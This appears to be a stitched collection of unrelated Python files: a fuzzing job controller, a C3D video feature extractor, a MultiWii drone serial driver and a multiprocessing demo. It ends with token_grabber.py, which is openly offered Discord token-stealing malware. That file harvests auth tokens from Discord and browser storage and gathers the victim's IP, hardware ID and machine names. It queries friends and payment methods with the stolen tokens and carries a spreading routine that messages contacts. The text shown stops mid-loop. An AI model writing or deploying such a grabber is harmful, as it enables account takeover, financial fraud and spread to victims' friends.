                                       fuzzer_name=self.fuzzers[fuzz_idx],
                                       db=self.db,
                                       listener=self.listener)

                    # Before starting a new fuzz job let's check if we are working with
                    # the latest version of the SUT and update it if needed.
                    self._check_update(next_job, running_jobs)

                    # Update fuzz_idx to point the next job's parameters.
                    fuzz_idx = (fuzz_idx + 1) % len(self.fuzzers)

                    # Notify the active listener about the new job.
                    self.listener.new_fuzz_job(ident=next_job_id,
                                               fuzzer=next_job.fuzzer_name,
                                               sut=next_job.sut_name,
                                               cost=next_job.cost,
                                               batch=next_job.batch)

                # Wait until there is enough capacity for the next job.
                self._wait_for_load(next_job.cost, running_jobs)

                # Each job runs in its own child process.
                proc = Process(target=self._run_job, args=(next_job,))
                running_jobs[next_job_id] = dict(job=next_job, proc=proc)
                # Notify the active listener that a job has been activated.
                self.listener.activate_job(ident=next_job_id)
                proc.start()
        except KeyboardInterrupt:
            pass
        except Exception as e:
            self.listener.warning(msg='Exception in the main controller loop: {exception}\n{trace}'.format(exception=e, trace=traceback.format_exc()))
        finally:
            # Terminate every child process and clean up the work directory.
            Controller.kill_process_tree(os.getpid(), kill_root=False)
            if os.path.exists(self.work_dir):
                shutil.rmtree(self.work_dir, ignore_errors=True)

    def _check_update(self, job, running_jobs):
        """Run an update job for *job*'s SUT if its ``update_condition`` says so.

        The update runs synchronously in the main process after every running
        job has been drained, since it would conflict with concurrent jobs.
        """
        sut_section = 'sut.' + job.sut_name
        if not self.config.has_option(sut_section, 'update'):
            return

        update_condition, update_condition_kwargs = config_get_callable(self.config, sut_section, 'update_condition')
        if not update_condition:
            return
        # NOTE(review): the returned callable is also used as a context
        # manager here -- presumably part of fuzzinator's callable convention;
        # confirm against config_get_callable.
        with update_condition:
            if not update_condition(**update_condition_kwargs):
                return

        next_job_id = self._next_job_id()
        next_job = UpdateJob(id=next_job_id,
                             config=self.config,
                             sut_name=job.sut_name)
        self.listener.new_update_job(ident=next_job_id, sut=job.sut_name)
        # Wait until every job has finished.
        self._wait_for_load(self.capacity, running_jobs)
        # Emit 'next_job available' event.
        self.listener.activate_job(ident=next_job_id)
        # Update job runs in the main thread since it's blocking for any other jobs.
        next_job.run()
        self.listener.remove_job(ident=next_job_id)

    def _wait_for_load(self, new_load, running_jobs):
        """Block until *new_load* additional cost fits under ``self.capacity``.

        Finished jobs are reaped from *running_jobs* on every poll; the current
        aggregate load is reported to the listener and returned.
        """
        while True:
            load = 0
            # Iterate over a snapshot of the keys since entries may be deleted.
            for ident in list(running_jobs):
                if not running_jobs[ident]['proc'].is_alive():
                    self.listener.remove_job(ident=ident)
                    del running_jobs[ident]
                else:
                    load += running_jobs[ident]['job'].cost
            self.listener.update_load(load=load)
            if load + new_load <= self.capacity:
                return load
            time.sleep(1)

    def _run_job(self, job):
        """Child-process entry point: run *job* and queue every issue it yields
        for reduction; report (not raise) any exception to the listener.
        """
        try:
            for issue in job.run():
                self.add_reduce_job(issue=issue)
        except Exception as e:
            self.listener.warning(msg='Exception in {job}: {exception}\n{trace}'.format(
                job=repr(job),
                exception=e,
                trace=traceback.format_exc()))

    def _next_job_id(self):
        """Return the next unique job identifier."""
        next_job_id = self._job_id
        self._job_id += 1
        return next_job_id

    def add_reduce_job(self, issue):
        """Queue *issue* for reduction by the main controller loop."""
        with self._lock:
            self._issue_queue.put(issue)

    def reduce_all(self):
        """Queue a reduce job for every stored issue that is neither reported
        nor reduced yet."""
        for issue in self.db.find_issues_by_suts([section for section in self.config.sections() if section.startswith('sut.') and section.count('.') == 1]):
            if not issue['reported'] and not issue['reduced']:
                self.add_reduce_job(issue)

    def validate(self, issue):
        """Run a validate job for *issue* synchronously in the current process."""
        next_job_id = self._next_job_id()
        next_job = ValidateJob(id=next_job_id,
                               config=self.config,
                               issue=issue,
                               db=self.db,
                               listener=self.listener)
        self.listener.new_validate_job(ident=next_job_id,
                                       sut=next_job.sut_name,
                                       issue_id=issue['id'])
        self.listener.activate_job(ident=next_job_id)
        next_job.run()
        self.listener.remove_job(ident=next_job_id)

    @staticmethod
    def kill_process_tree(pid, kill_root=True, sig=signal.SIGTERM):
        """Send *sig* to every descendant of *pid* (and to *pid* itself if
        *kill_root* is true), then wait briefly for them to exit."""
        try:
            root_proc = psutil.Process(pid)
            children = root_proc.children(recursive=True)
            if kill_root:
                children.append(root_proc)

            for proc in children:
                # Would be easier to use proc.terminate() here but psutils
                # (up to version 5.4.0) on Windows terminates processes with
                # the 0 signal/code, making the outcome of the terminated
                # process indistinguishable from a successful execution.
                try:
                    os.kill(proc.pid, sig)
                except OSError:
                    pass
            psutil.wait_procs(children, timeout=1)
        except psutil.NoSuchProcess:
            pass
|
extract_features.py | from __future__ import absolute_import
import argparse
import multiprocessing
import os
import sys
import time
import traceback
import numpy as np
from progressbar import ProgressBar
import h5py
from src.data import VideoGenerator
def extract_features(videos_dir, output_dir, batch_size, num_threads,
                     queue_size, num_gpus):
    """Extract C3D fc6 features for every ``.mp4`` in *videos_dir* and store
    them in ``<output_dir>/video_features.hdf5`` (one dataset per video id).

    The pipeline is three groups of processes connected by queues:
    *num_threads* generator processes decode videos, *num_gpus* extractor
    processes run the C3D model, and a single saver process writes the
    results to the HDF5 file.
    """
    # Defining variables
    input_size = (112, 112)  # spatial size fed to the C3D network
    length = 16              # clip length in frames
    wait_time = 0.1          # queue polling interval (seconds)
    output_path = os.path.join(output_dir, 'video_features.hdf5')
    mode = 'r+' if os.path.exists(output_path) else 'w'

    # Collect the ids of the videos whose features were already extracted.
    # Bug fix: h5py's keys() returns a lazy view that is invalid once the
    # file is closed, so it must be materialized before close().
    output_file = h5py.File(output_path, mode)
    extracted_videos = list(output_file.keys())
    output_file.close()

    videos_ids = [v[:-4] for v in os.listdir(videos_dir) if v[-4:] == '.mp4']
    # Lets remove from the list videos_ids, the ones already extracted its features
    videos_ids_to_extract = list(set(videos_ids) - set(extracted_videos))
    nb_videos = len(videos_ids_to_extract)
    print('Total number of videos: {}'.format(len(videos_ids)))
    print('Videos already extracted its features: {}'.format(
        len(extracted_videos)))
    print('Videos to extract its features: {}'.format(nb_videos))

    # Creating Parallel Fetching Video Data
    print('Creating {} process to fetch video data'.format(num_threads))
    data_gen_queue = multiprocessing.Queue(maxsize=queue_size)
    _stop_all_generators = multiprocessing.Event()
    _stop_all_extractors = multiprocessing.Event()

    def data_generator_task(index):
        # Each generator handles an interleaved slice of the video list.
        generator = VideoGenerator(
            videos_ids_to_extract[index:nb_videos:num_threads], videos_dir,
            'mp4', length, input_size)
        keep = True
        while keep:
            try:
                if data_gen_queue.qsize() < queue_size:
                    try:
                        generator_output = next(generator)
                    except ValueError:
                        # Unreadable clip; skip it and keep going.
                        continue
                    data_gen_queue.put(generator_output)
                else:
                    time.sleep(wait_time)
            except StopIteration:
                print('End')
                break
            except Exception:
                keep = False
                print('Something went wrong with generator_process')
                # Bug fix: the original did print(traceback.print_exc()),
                # which prints the traceback and then a spurious 'None'.
                traceback.print_exc()

    generator_process = [
        multiprocessing.Process(target=data_generator_task, args=[i])
        for i in range(num_threads)
    ]
    for process in generator_process:
        process.daemon = True
        process.start()

    data_save_queue = multiprocessing.Queue()

    def extracting_features_task():
        # Loading the model
        print('Loading model')
        model = C3D_conv_features(summary=True)
        print('Compiling model')
        model.compile(optimizer='sgd', loss='mse')
        print('Compiling done!')
        print('Starting extracting features')
        print('Loading mean')
        mean_total = np.load('data/models/c3d-sports1M_mean.npy')
        mean = np.mean(mean_total, axis=(0, 2, 3, 4), keepdims=True)
        while not (_stop_all_generators.is_set() and data_gen_queue.empty()):
            generator_output = None
            # NOTE(review): this inner loop can block forever if the
            # generators stop while the queue is empty -- confirm shutdown
            # ordering is always generators-first.
            while True:
                if not data_gen_queue.empty():
                    generator_output = data_gen_queue.get()
                    if not generator_output:
                        continue
                    break
                else:
                    time.sleep(wait_time)
            video_id, X = generator_output
            if X is None:
                print('Could not be read the video {}'.format(video_id))
                continue
            # Subtract the Sports-1M channel mean before inference.
            X = X - mean
            Y = model.predict(X, batch_size=batch_size)
            data_save_queue.put((video_id, Y))
            print('Extracted features from video {}'.format(video_id))

    extractors_process = [
        multiprocessing.Process(target=extracting_features_task)
        for i in range(num_gpus)
    ]
    for p in extractors_process:
        p.daemon = True
        p.start()

    # Create the process that will get all the extracted features from the data_save_queue and
    # store it on the hdf5 file.
    def saver_task():
        while not (_stop_all_extractors.is_set() and data_save_queue.empty()):
            extracted_output = None
            while True:
                if not data_save_queue.empty():
                    extracted_output = data_save_queue.get()
                    if not extracted_output:
                        continue
                    break
                else:
                    time.sleep(wait_time)
            video_id, features = extracted_output
            if features is None:
                print('Something went wrong')
                continue
            assert features.shape[1] == 4096
            # Single writer: only this process opens the HDF5 file for writing.
            with h5py.File(output_path, 'r+') as f:
                f.create_dataset(video_id, data=features, dtype='float32')
            print('Saved video {}'.format(video_id))

    saver_process = multiprocessing.Process(target=saver_task)
    saver_process.daemon = True
    saver_process.start()

    # Joining processes: generators first, then extractors, then the saver.
    for p in generator_process:
        p.join()
    _stop_all_generators.set()
    for p in extractors_process:
        p.join()
    _stop_all_extractors.set()
    saver_process.join()
def C3D_conv_features(summary=False):
    """Build the C3D network truncated at the fc6 layer.

    Loads the Sports-1M pre-trained weights and then removes the last four
    layers (do1, fc7, do2, fc8) so that the 4096-d fc6 activations become
    the model output, usable as clip-level convolutional features.

    Args:
        summary: If True, print the Keras model summary before returning.

    Returns:
        A Keras `Sequential` model whose final layer is fc6.
    """
    # Keras 1.x-style API throughout: Convolution3D(nb_filter, k1, k2, k3),
    # `border_mode`/`subsample` instead of the modern `padding`/`strides`.
    from keras.layers.convolutional import Convolution3D, MaxPooling3D, ZeroPadding3D
    from keras.layers.core import Dense, Dropout, Flatten
    from keras.models import Sequential
    model = Sequential()
    # 1st layer group
    model.add(
        Convolution3D(
            64,
            3,
            3,
            3,
            activation='relu',
            border_mode='same',
            name='conv1',
            subsample=(1, 1, 1),
            # Channels-first clips: (3 RGB channels, 16 frames, 112x112 crop).
            input_shape=(3, 16, 112, 112),
            trainable=False))
    # Temporal pooling is deferred (pool_size 1 on the time axis) in pool1.
    model.add(
        MaxPooling3D(
            pool_size=(1, 2, 2),
            strides=(1, 2, 2),
            border_mode='valid',
            name='pool1'))
    # 2nd layer group
    model.add(
        Convolution3D(
            128,
            3,
            3,
            3,
            activation='relu',
            border_mode='same',
            name='conv2',
            subsample=(1, 1, 1),
            trainable=False))
    model.add(
        MaxPooling3D(
            pool_size=(2, 2, 2),
            strides=(2, 2, 2),
            border_mode='valid',
            name='pool2'))
    # 3rd layer group
    model.add(
        Convolution3D(
            256,
            3,
            3,
            3,
            activation='relu',
            border_mode='same',
            name='conv3a',
            subsample=(1, 1, 1),
            trainable=False))
    model.add(
        Convolution3D(
            256,
            3,
            3,
            3,
            activation='relu',
            border_mode='same',
            name='conv3b',
            subsample=(1, 1, 1),
            trainable=False))
    model.add(
        MaxPooling3D(
            pool_size=(2, 2, 2),
            strides=(2, 2, 2),
            border_mode='valid',
            name='pool3'))
    # 4th layer group
    model.add(
        Convolution3D(
            512,
            3,
            3,
            3,
            activation='relu',
            border_mode='same',
            name='conv4a',
            subsample=(1, 1, 1),
            trainable=False))
    model.add(
        Convolution3D(
            512,
            3,
            3,
            3,
            activation='relu',
            border_mode='same',
            name='conv4b',
            subsample=(1, 1, 1),
            trainable=False))
    model.add(
        MaxPooling3D(
            pool_size=(2, 2, 2),
            strides=(2, 2, 2),
            border_mode='valid',
            name='pool4'))
    # 5th layer group
    model.add(
        Convolution3D(
            512,
            3,
            3,
            3,
            activation='relu',
            border_mode='same',
            name='conv5a',
            subsample=(1, 1, 1),
            trainable=False))
    model.add(
        Convolution3D(
            512,
            3,
            3,
            3,
            activation='relu',
            border_mode='same',
            name='conv5b',
            subsample=(1, 1, 1),
            trainable=False))
    # Pad the spatial dims so pool5 divides evenly before flattening.
    model.add(ZeroPadding3D(padding=(0, 1, 1), name='zeropadding'))
    model.add(
        MaxPooling3D(
            pool_size=(2, 2, 2),
            strides=(2, 2, 2),
            border_mode='valid',
            name='pool5'))
    model.add(Flatten(name='flatten'))
    # FC layers group
    model.add(Dense(4096, activation='relu', name='fc6', trainable=False))
    model.add(Dropout(.5, name='do1'))
    model.add(Dense(4096, activation='relu', name='fc7'))
    model.add(Dropout(.5, name='do2'))
    # fc8 is the original 487-way Sports-1M classifier head.
    model.add(Dense(487, activation='softmax', name='fc8'))
    # Load weights
    model.load_weights('data/models/c3d-sports1M_weights.h5')
    # Strip fc8, do2, fc7 and do1 so fc6 is the output layer.
    # NOTE(review): `pop_layer()` is not part of stock Keras Sequential
    # (the stock method is `pop()`); presumably this targets the project's
    # patched Keras build -- verify before upgrading Keras.
    for _ in range(4):
        model.pop_layer()
    if summary:
        print(model.summary())
    return model
if __name__ == '__main__':
    # CLI entry point: parse options and launch the extraction pipeline.
    parser = argparse.ArgumentParser(
        description='Extract video features using C3D network')
    parser.add_argument('-d', '--videos-dir', type=str, dest='directory',
                        default='data/videos',
                        help='videos directory (default: %(default)s)')
    parser.add_argument('-o', '--output-dir', type=str, dest='output',
                        default='data/dataset',
                        help='directory where to store the extracted features (default: %(default)s)')
    parser.add_argument('-b', '--batch-size', type=int, dest='batch_size',
                        default=32,
                        help='batch size when extracting features (default: %(default)s)')
    parser.add_argument('-t', '--num-threads', type=int, dest='num_threads',
                        default=8,
                        help='number of threads to fetch videos (default: %(default)s)')
    parser.add_argument('-q', '--queue-size', type=int, dest='queue_size',
                        default=12,
                        help='maximum number of elements at the queue when fetching videos (default %(default)s)')
    parser.add_argument('-g', '--num-gpus', type=int, dest='num_gpus',
                        default=1,
                        help='number of gpus to use for extracting features (default: %(default)s)')
    args = parser.parse_args()
    extract_features(args.directory, args.output, args.batch_size,
                     args.num_threads, args.queue_size, args.num_gpus)
|
multiwii.py | #!/usr/bin/env python
import time
import logging
import serial
import threading
import struct # for decoding data strings
class drone:
    """Driver for a MultiWii-based multicopter attached over a serial port.

    On construction it opens the port at 115200 8N1 and starts a background
    thread (`loop`) that continuously pushes the cached RC commands to the
    flight controller via the MultiWii Serial Protocol (MSP) and polls back
    whichever telemetry groups are enabled by the ATT/ALT/RC/MOT/RAW flags.

    NOTE(review): this module is Python 2 (`except Exception, e`, `print`
    statements, `str.encode("hex")`).
    """
    def __init__(self, port):
        """Configure and open `port`, build the MSP request frames, start the loop thread."""
        self.started = True
        # Feature flags: a value of 1 enables the matching step in loop().
        self.ATT = 0 # Ask and save the attitude of the multicopter
        self.ALT = 0 # Ask and save the altitude of the multicopter
        self.RC = 1 # Ask and save the pilot commands of the multicopter
        self.SET_RC = 1 # Set rc command
        self.MOT = 0 # Ask and save the PWM of the motors that the MW is writing to the multicopter
        self.RAW = 0 # Ask and save the raw imu data of the multicopter
        self.CMD = 0 # Send commands to the MW to control it
        self.UDP = 0 # Save or use UDP data (to be adjusted)
        self.ASY = 0 # Use async communicacion
        self.SCK = 0 # Use regular socket communication
        self.SCKSRV = 0 # Use socketserver communication
        self.PRINT = 0 # Print data to terminal, useful for debugging
        ###############################
        # Communication via serial port
        ###############################
        self.port = port
        self.ser=serial.Serial()
        self.ser.port=self.port
        self.ser.baudrate=115200
        self.ser.bytesize=serial.EIGHTBITS
        self.ser.parity=serial.PARITY_NONE
        self.ser.stopbits=serial.STOPBITS_ONE
        self.ser.timeout=0  # non-blocking reads
        self.ser.xonxoff=False
        self.ser.rtscts=False
        self.ser.dsrdtr=False
        self.ser.writeTimeout=2
        self.timeMSP=0.02  # settle time between MSP exchanges, in seconds
        try:
            self.ser.open()
        except Exception, e:
            logging.error("Error while open serial port: " + str(e))
            exit()
        ###############################
        # Multiwii Serial Protocol
        # Hex value for MSP request
        ##############################
        # Pre-built zero-payload request frames: '$M<' + size 0 + message id
        # + checksum (size XOR id == id, so the id byte repeats).
        self.BASIC="\x24\x4d\x3c\x00" #MSG Send Header (to MultiWii)
        self.MSP_IDT=self.BASIC+"\x64\x64" #MSG ID: 100
        self.MSP_STATUS=self.BASIC+"\x65\x65" #MSG ID: 101
        self.MSP_RAW_IMU=self.BASIC+"\x66\x66" #MSG ID: 102
        self.MSP_SERVO=self.BASIC+"\x67\x67" #MSG ID: 103
        self.MSP_MOTOR=self.BASIC+"\x68\x68" #MSG ID: 104
        self.MSP_RC=self.BASIC+"\x69\x69" #MSG ID: 105
        self.MSP_RAW_GPS=self.BASIC+"\x6A\x6A" #MSG ID: 106
        self.MSP_ATTITUDE=self.BASIC+"\x6C\x6C" #MSG ID: 108
        self.MSP_ALTITUDE=self.BASIC+"\x6D\x6D" #MSG ID: 109
        self.MSP_BAT = self.BASIC+"\x6E\x6E" #MSG ID: 110
        self.MSP_COMP_GPS=self.BASIC+"\x71\x71" #MSG ID: 0x71 = 113 -- NOTE(review): named COMP_GPS, but CMD2CODE lists MSP_COMP_GPS as 107; verify against firmware
        self.MSP_SET_RC=self.BASIC+"\xC8\xC8" #MSG ID: 200
        # Symbolic MSP command-name -> numeric message-id map for sendData().
        self.CMD2CODE = {
            # Getter
            'MSP_IDENT':100,
            'MSP_STATUS':101,
            'MSP_RAW_IMU':102,
            'MSP_SERVO':103,
            'MSP_MOTOR':104,
            'MSP_RC':105,
            'MSP_RAW_GPS':106,
            'MSP_COMP_GPS':107,
            'MSP_ATTITUDE':108,
            'MSP_ALTITUDE':109,
            'MSP_ANALOG':110,
            'MSP_RC_TUNING':111,
            'MSP_PID':112,
            'MSP_BOX':113,
            'MSP_MISC':114,
            'MSP_MOTOR_PINS':115,
            'MSP_BOXNAMES':116,
            'MSP_PIDNAMES':117,
            'MSP_WP':118,
            'MSP_BOXIDS':119,
            # Setter
            'MSP_SET_RAW_RC':200,
            'MSP_SET_RAW_GPS':201,
            'MSP_SET_PID':202,
            'MSP_SET_BOX':203,
            'MSP_SET_RC_TUNING':204,
            'MSP_ACC_CALIBRATION':205,
            'MSP_MAG_CALIBRATION':206,
            'MSP_SET_MISC':207,
            'MSP_RESET_CONF':208,
            'MSP_SET_WP':209,
            'MSP_SWITCH_RC_SERIAL':210,
            'MSP_IS_SERIAL':211,
            'MSP_DEBUG':254,
        }
        ###############################
        # Initialize Global Variables
        ###############################
        self.latitude = 0.0
        self.longitude = 0.0
        self.altitude = -0
        self.heading = -0
        self.timestamp = -0
        self.gpsString = -0
        self.numSats = -0
        self.accuracy = -1
        self.beginFlag = 0
        self.roll = 0
        self.pitch = 0
        self.yaw = 0
        self.throttle = 0
        self.angx = 0.0
        self.angy = 0.0
        self.m1 = 0
        self.m2 = 0
        self.m3 = 0
        self.m4 = 0
        self.message = ""
        self.ax = 0
        selfay = 0  # NOTE(review): almost certainly a typo for 'self.ay' -- as written it only binds a throwaway local
        self.az = 0
        self.gx = 0
        self.gy = 0
        self.gz = 0
        self.magx = 0
        self.magy = 0
        self.magz = 0
        self.elapsed = 0
        self.flytime = 0
        self.numOfValues = 0
        self.precision = 3
        self.rcData = [1500, 1500, 1500, 1500] #order -> roll, pitch, yaw, throttle
        self.loopThread = threading.Thread(target=self.loop)
        if self.ser.isOpen():
            print("Wait 5 sec for calibrate Multiwii")
            time.sleep(5)
            self.loopThread.start()
    def stop(self):
        """Ask the polling thread to exit after its current iteration."""
        self.started = False
    #############################################################
    # littleEndian(value)
    # receives: a parsed, hex data piece
    # outputs: the decimal value of that data
    # function: swaps byte by byte to convert little
    # endian to big endian
    # function: calls 2's compliment to convert to decimal
    # returns: The integer value
    #############################################################
    def littleEndian(self, value):
        length = len(value) # gets the length of the data piece
        actual = ""
        for x in range(0, length/2): #go till you've reach the halway point (Python 2 integer division)
            actual += value[length-2-(2*x):length-(2*x)] #flips all of the bytes (the last shall be first)
            x += 1  # no effect: range() rebinds x on each iteration
        intVal = self.twosComp(actual) # sends the data to be converted from 2's compliment to int
        return intVal # returns the integer value
    ###################################################################
    # twosComp(hexValue)
    # receives: the big endian hex value (correct format)
    # outputs: the decimal value of that data
    # function: if the value is negative, swaps all bits
    # up to but not including the rightmost 1.
    # Else, just converts straight to decimal.
    # (Flip all the bits left of the rightmost 1)
    # returns: the integer value
    ###################################################################
    def twosComp(self, hexValue):
        firstVal = int(hexValue[:1], 16)
        if firstVal >= 8: # if first bit is 1
            bValue = bin(int(hexValue, 16))
            bValue = bValue[2:] # removes 0b header
            newBinary = []
            length = len(bValue)
            index = bValue.rfind('1') # find the rightmost 1
            for x in range(0, index+1): # swap bits up to rightmost 1
                if x == index: #if at rightmost one, just append remaining bits
                    newBinary.append(bValue[index:])
                elif bValue[x:x+1] == '1':
                    newBinary.append('0')
                elif bValue[x:x+1] == '0':
                    newBinary.append('1')
                x += 1  # no effect: range() rebinds x on each iteration
            newBinary = ''.join(newBinary) # converts char array to string
            finalVal = -int(newBinary, 2) # converts to decimal
            return finalVal
        else: # if not a negative number, simply convert to decimal
            return int(hexValue, 16)
    def sendData(self, data_length, code, data):
        """Frame and send one MSP command: '$M<' + length + code + payload + XOR checksum.

        `data` is a list of 16-bit values packed little-endian; returns the
        byte count reported by serial.write(), or None on failure.
        """
        checksum = 0
        total_data = ['$', 'M', '<', data_length, code] + data
        # Checksum covers length, code and payload (everything after '$M<').
        for i in struct.pack('<2B%dh' % len(data), *total_data[3:len(total_data)]):
            checksum = checksum ^ ord(i)  # Python 2: iterating a packed str yields 1-char strings
        total_data.append(checksum)
        try:
            b = None
            b = self.ser.write(struct.pack('<3c2B%dhB' % len(data), *total_data))
        except Exception, ex:
            print 'send data error'
            print(ex)
        return b
    #############################################################
    # askRC()
    # receives: nothing
    # outputs: nothing
    # function: Do everything to ask the MW for data and save it on globals
    # returns: nothing
    #############################################################
    def askRC(self):
        self.ser.flushInput() # cleans out the serial port
        self.ser.flushOutput()
        self.ser.write(self.MSP_RC) # gets RC information
        time.sleep(self.timeMSP)
        response = self.ser.readline()
        if str(response) == "":
            #print(msp_hex)
            #print("Header: " + msp_hex[:6])
            #payload = int(msp_hex[6:8])
            #print("Payload: " + msp_hex[6:8])
            #print("Code: " + msp_hex[8:10])
            #print("RC data unavailable")
            return
        else:
            # Python 2 str->hex codec; two hex chars per response byte.
            msp_hex = response.encode("hex")
            # Channels are 16-bit little-endian values starting at byte 5
            # (hex offset 10): roll, pitch, yaw, throttle.
            if msp_hex[10:14] == "":
                print("roll unavailable")
            else:
                self.roll = float(self.littleEndian(msp_hex[10:14]))
            if msp_hex[14:18] == "":
                print("pitch unavailable")
            else:
                self.pitch = float(self.littleEndian(msp_hex[14:18]))
            if msp_hex[18:22] == "":
                print("yaw unavailable")
            else:
                self.yaw = float(self.littleEndian(msp_hex[18:22]))
            if msp_hex[22:26] == "":
                print("throttle unavailable")
            else:
                self.throttle = float(self.littleEndian(msp_hex[22:26]))
            #print(str(self.roll) + " " + str(self.pitch) + " " + str(self.yaw) + " " + str(self.throttle))
    def setRC(self):
        """Push the cached rcData (roll, pitch, yaw, throttle) via MSP_SET_RAW_RC."""
        self.sendData(8, self.CMD2CODE["MSP_SET_RAW_RC"], self.rcData)
        time.sleep(self.timeMSP)
        #print self.rcData
    def loop(self):
        """Background polling loop; runs until stop() clears self.started."""
        print('success')
        try:
            #########################################################################
            # Loop
            #########################################################################
            while self.started:
                if self.SET_RC:
                    self.setRC()
                if self.ATT:
                    askATT()  # NOTE(review): undefined name (missing self., no such method) -- dead code while ATT stays 0
                if self.ALT:
                    askALT()  # NOTE(review): undefined name -- dead code while ALT stays 0
                if self.RC:
                    self.askRC()
                if self.MOT:
                    askMOTOR()  # NOTE(review): undefined name -- dead code while MOT stays 0
                if self.RAW:
                    askRAW()  # NOTE(review): undefined name -- dead code while RAW stays 0
                if self.SCK:
                    getUDP()  # NOTE(review): undefined name -- dead code while SCK stays 0
                """
                if beginFlag != 1: # Won't send any data until both altitude and heading are valid data
                    if self.TIME:
                        message = str(round(diff,precision))
                    if self.FLYT:
                        message = message+" "+str(round(elapsed,precision))
                    if self.ATT:
                        message = message+" "+str(angx)+" "+str(angy)+" "+str(heading)
                    if self.RC:
                        message = message+" "+str(roll)+" "+str(pitch)+" "+str(yaw)+" "+str(throttle)
                    if self.ALT:
                        message = message+" "+str(altitude)
                    if self.MOT:
                        message = message+" "+str(m1)+" "+str(m2)+" "+str(m3)+" "+str(m4)
                    if self.RAW:
                        message = message+" "+str(ax)+" "+str(ay)+" "+str(az)+" "+str(gx)+" "+str(gy)+" "+str(gz)+" "+str(magx)+" "+str(magy)+" "+str(magz)
                    if self.UDP:
                        if udp_mess == "":
                            message = message+" "+udp_mess2
                            udp_mess2=""
                        message = message+" "+udp_mess
                    if self.PRINT:
                        print(message)
                else: # If invalid, continue looping
                    beginFlag = 0 # resets the flag """
            self.ser.close()
            file.close()  # NOTE(review): 'file' here is the Python 2 builtin type, not an open handle -- this raises and is swallowed by the except below; verify intent
        except Exception,e1: # Catches any errors in the serial communication
            print("Error on main: "+str(e1))
|
test8.py | # import os
# import multiprocessing
#
#
# def foo(i):
# # 同样的参数传递方法
# print("这里是 ", multiprocessing.current_process().name)
# print('模块名称:', __name__)
# print('父进程 id:', os.getppid()) # 获取父进程id
# print('当前子进程 id:', os.getpid()) # 获取自己的进程id
# print('------------------------')
#
#
# if __name__ == '__main__':
#
# for i in range(50):
# p = multiprocessing.Process(target=foo, args=(i,))
# p.start()
# from multiprocessing import Process
#
# lis = []
#
#
# def foo(i):
# lis.append(i)
# lis.append(i)
# __import__('pprint').pprint(lis)
# print("This is Process ", i, " and lis is ", lis, " and lis.address is ", id(lis))
#
#
# if __name__ == '__main__':
# for i in range(5):
# p = Process(target=foo, args=(i,))
# p.start()
#
# p.join()
# print("The end of list_1:", lis)
from multiprocessing import Process
from multiprocessing import Manager
def func(i, dic):
    """Store ``100 + i`` under key ``i`` in a (possibly shared) mapping.

    Works with a plain dict or a multiprocessing.Manager().dict proxy;
    the mapping's current state is printed after the insertion.
    """
    dic[i] = 100 + i
    print(dic)
if __name__ == '__main__':
    # Manager().dict() is a proxy shared safely across processes.
    dic = Manager().dict()
    # dic = Manager().list()
    # BUG FIX: the original kept only the last Process in `p` and joined just
    # that one, so the final print could race with still-running workers.
    # Collect every process and join them all before reading the dict.
    procs = []
    for i in range(10):
        p = Process(target=func, args=(i, dic))
        p.start()
        procs.append(p)
    for p in procs:
        p.join()
    print(dic)
|
token_grabber.py | import os
if os.name != "nt":
exit()
from re import findall
from json import loads, dumps
from base64 import b64decode
from subprocess import Popen, PIPE
from urllib.request import Request, urlopen
from datetime import datetime
from threading import Thread
from time import sleep
from sys import argv
LOCAL = os.getenv("LOCALAPPDATA")
ROAMING = os.getenv("APPDATA")
PATHS = {
"Discord" : ROAMING + "\\Discord",
"Discord Canary" : ROAMING + "\\discordcanary",
"Discord PTB" : ROAMING + "\\discordptb",
"Google Chrome" : LOCAL + "\\Google\\Chrome\\User Data\\Default",
"Opera" : ROAMING + "\\Opera Software\\Opera Stable",
"Brave" : LOCAL + "\\BraveSoftware\\Brave-Browser\\User Data\\Default",
"Yandex" : LOCAL + "\\Yandex\\YandexBrowser\\User Data\\Default"
}
def getheaders(token=None, content_type="application/json"):
headers = {
"Content-Type": content_type,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
}
if token:
headers.update({"Authorization": token})
return headers
def getuserdata(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getheaders(token))).read().decode())
except:
pass
def gettokens(path):
path += "\\Local Storage\\leveldb"
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith(".log") and not file_name.endswith(".ldb"):
continue
for line in [x.strip() for x in open(f"{path}\\{file_name}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
for token in findall(regex, line):
tokens.append(token)
return tokens
def getdeveloper():
dev = "wodx"
try:
dev = urlopen(Request("https://pastebin.com/raw/ssFxiejv")).read().decode()
except:
pass
return dev
def getip():
ip = "None"
try:
ip = urlopen(Request("https://api.ipify.org")).read().decode().strip()
except:
pass
return ip
def getavatar(uid, aid):
url = f"https://cdn.discordapp.com/avatars/{uid}/{aid}.gif"
try:
urlopen(Request(url))
except:
url = url[:-4]
return url
def gethwid():
p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
return (p.stdout.read() + p.stderr.read()).decode().split("\n")[1]
def getfriends(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/relationships", headers=getheaders(token))).read().decode())
except:
pass
def getchat(token, uid):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/channels", headers=getheaders(token), data=dumps({"recipient_id": uid}).encode())).read().decode())["id"]
except:
pass
def has_payment_methods(token):
try:
return bool(len(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources", headers=getheaders(token))).read().decode())) > 0)
except:
pass
def send_message(token, chat_id, form_data):
try:
urlopen(Request(f"https://discordapp.com/api/v6/channels/{chat_id}/messages", headers=getheaders(token, "multipart/form-data; boundary=---------------------------325414537030329320151394843687"), data=form_data.encode())).read().decode()
except:
pass
def spread(token, form_data, delay):
return # Remove to re-enabled
for friend in getfriends(token):
try:
chat_id = getchat(token, friend["id"])
send_message(token, chat_id, form_data)
except Exception as e:
pass
sleep(delay)
def main():
cache_path = ROAMING + "\\.cache~$"
prevent_spam = True
self_spread = True
embeds = []
working = []
checked = []
already_cached_tokens = []
working_ids = []
ip = getip()
pc_username = os.getenv("UserName")
pc_name = os.getenv("COMPUTERNAME")
user_path_name = os.getenv("userprofile").split("\\")[2]
developer = getdeveloper()
for platform, path in PATHS.items():
if not os.path.exists(path):
continue
for token in gettokens(path):
if token in checked:
continue
checked.append(token)
